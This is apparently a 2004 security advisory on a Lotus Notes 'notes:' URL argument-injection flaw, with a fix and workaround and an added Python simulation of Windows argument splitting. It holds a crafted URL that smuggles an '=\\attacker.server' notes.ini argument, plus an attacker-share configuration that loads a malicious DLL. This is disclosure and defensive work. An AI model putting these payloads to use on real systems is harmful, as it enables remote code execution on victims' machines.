Message-ID: <20040627150038.GA14514@jouko.iki.fi>
From: jouko at iki.fi (Jouko Pynnonen)
Subject: Lotus Notes URL argument injection vulnerability


OVERVIEW
========

Lotus Notes is a groupware/e-mail system developed by Lotus Software. 
Due to its security and collaboration features it's used particularly 
by large organizations, government agencies, etc. IBM estimates it is 
used by 60 million people.

During the client-side Windows installation of Lotus Notes, a "notes:" 
URL protocol handler is registered in the registry. Because the URL is 
passed to notes.exe as an unquoted command line argument, an argument 
injection attack allows an intruder to pass additional command line 
arguments to notes.exe, which can lead to execution of arbitrary code.



DETAILS
=======

The installed registry entry causes any "notes:" URL to be opened by 
running notes.exe with the URL as its argument. Since the URL is not 
quoted on the command line, a URL containing a space character is 
split: notes.exe receives the characters after the space as a second 
command line argument. Any web page (or HTML e-mail message) can cause 
notes.exe to be started in this way simply by referring to a notes: URL.

The location of the Notes configuration file, notes.ini, can be 
specified on the command line by prefixing it with an equals sign (=). 
The notes.ini file may be located on a network share. An attacker can 
therefore use the injected argument to point notes.exe at an arbitrary 
notes.ini file on a share they control, so that the command run when 
opening the URL would be e.g.

  notes.exe =\\attacker.server\notes\notes.ini
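The splitting described above can be reproduced without Windows. The
following is an added example, not code from the advisory or from Lotus: it
substitutes a URL into a handler command template the way the shell does
(modelled here as plain text substitution, with no escaping of the URL) and
then splits the resulting command line using the CommandLineToArgvW rules.
The handler paths, the "%1" templates and the notes: URL are constructed
for the example; the advisory does not give the real registry value.

```python
import re
from typing import List

# Constructed registry command templates for a URL protocol handler.
# The installation path is an assumption made for this example.
UNQUOTED_TEMPLATE = r'C:\Lotus\Notes\notes.exe %1'     # vulnerable shape
QUOTED_TEMPLATE = r'"C:\Lotus\Notes\notes.exe" "%1"'   # %1 wrapped in quotes

# Constructed notes: URL that smuggles an "=notes.ini" argument after a space.
MALICIOUS_URL = r'notes:///x =\\attacker.server\notes\notes.ini'


def split_windows_cmdline(cmdline: str) -> List[str]:
    """Split a command line into argv following the CommandLineToArgvW rules.

    Whitespace separates arguments and double quotes group them.  A run of
    backslashes is only special directly before a double quote: 2n of them
    become n backslashes plus a quote toggle, 2n+1 become n backslashes plus
    a literal quote.  argv[0] gets the simpler rule: either the quoted text
    or everything up to the first whitespace, with no backslash handling.
    """
    argv: List[str] = []
    i, n = 0, len(cmdline)
    while i < n and cmdline[i] in " \t":
        i += 1
    if i < n and cmdline[i] == '"':              # quoted program name
        j = cmdline.find('"', i + 1)
        j = n if j == -1 else j
        argv.append(cmdline[i + 1:j])
        i = j + 1
    else:                                        # bare program name
        j = i
        while j < n and cmdline[j] not in " \t":
            j += 1
        argv.append(cmdline[i:j])
        i = j
    while True:
        while i < n and cmdline[i] in " \t":
            i += 1
        if i >= n:
            break
        cur: List[str] = []
        in_quotes = False
        while i < n:
            c = cmdline[i]
            if c == "\\":
                j = i
                while j < n and cmdline[j] == "\\":
                    j += 1
                nbs = j - i
                if j < n and cmdline[j] == '"':  # backslashes before a quote
                    cur.append("\\" * (nbs // 2))
                    if nbs % 2 == 1:
                        cur.append('"')          # escaped literal quote
                    else:
                        in_quotes = not in_quotes
                    i = j + 1
                else:                            # plain backslashes, e.g. UNC paths
                    cur.append("\\" * nbs)
                    i = j
            elif c == '"':
                in_quotes = not in_quotes
                i += 1
            elif c in " \t" and not in_quotes:   # unquoted space ends the argument
                break
            else:
                cur.append(c)
                i += 1
        argv.append("".join(cur))
    return argv


def expand_handler_template(template: str, url: str) -> str:
    """Substitute the URL into the handler's command template (no escaping)."""
    return template.replace("%1", url)


def argv_for_url(template: str, url: str) -> List[str]:
    """argv that the handler executable receives for a given URL."""
    return split_windows_cmdline(expand_handler_template(template, url))


def url_argument_unquoted(template: str) -> bool:
    """Audit check: True when %1 is not wrapped in double quotes, so a space
    inside the URL turns into extra command line arguments."""
    return re.search(r'"%1"', template) is None


if __name__ == "__main__":
    for template in (UNQUOTED_TEMPLATE, QUOTED_TEMPLATE):
        print("unquoted %1:", url_argument_unquoted(template))
        print("argv:", argv_for_url(template, MALICIOUS_URL))
```

With the unquoted template the URL yields three argv entries, the last one
being `=\\attacker.server\notes\notes.ini`, which is exactly the command line
shown above. Quoting `%1` keeps the same URL in one argument, but it is only
a partial mitigation: a URL carrying a literal double quote
(`notes:///x" =\\attacker.server\notes\notes.ini`) still closes the quotes
and produces the extra argument, which is why removing the handler, or
having the application refuse such arguments, is the dependable fix.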

The notes.ini file specifies the location of the Notes data directory, 
which in this case can likewise be located on the attacker's network 
share. The notes.ini file could contain e.g.

  [Notes]
  Directory=\\attacker.server\notes

The program loads some dynamic libraries from this directory. The 
attacker can place arbitrary code in the initialization routine 
(DllMain) of such a DLL and have it run during notes.exe startup. The 
scenario was successfully tested with an exploit: on opening the 
malicious web page, the victim system downloaded the DLL from the 
share and ran the code in it.

The exploit requires that notes.exe not already be running while the 
victim views the malicious web page or e-mail message, because the 
DLLs are only loaded at program startup. It also requires that 
outgoing connections to Internet (SMB) shares are not blocked by 
firewalls or registry settings.



SOLUTION
========

IBM was contacted on March 17, 2004. A fix, SPR# KSPR5X6VEA, has now 
been released to solve the issue. As a workaround, the registry key

   HKEY_CLASSES_ROOT\Notes\Shell\Open\Command

can be removed, which unregisters the "notes:" URL handler entirely.



CREDITS
=======

The vulnerability was discovered and researched by Jouko Pynnönen, 
Finland.





-- 
Jouko Pynnönen          Web: http://iki.fi/jouko/
jouko@....fi            GSM: +358 41 5504555
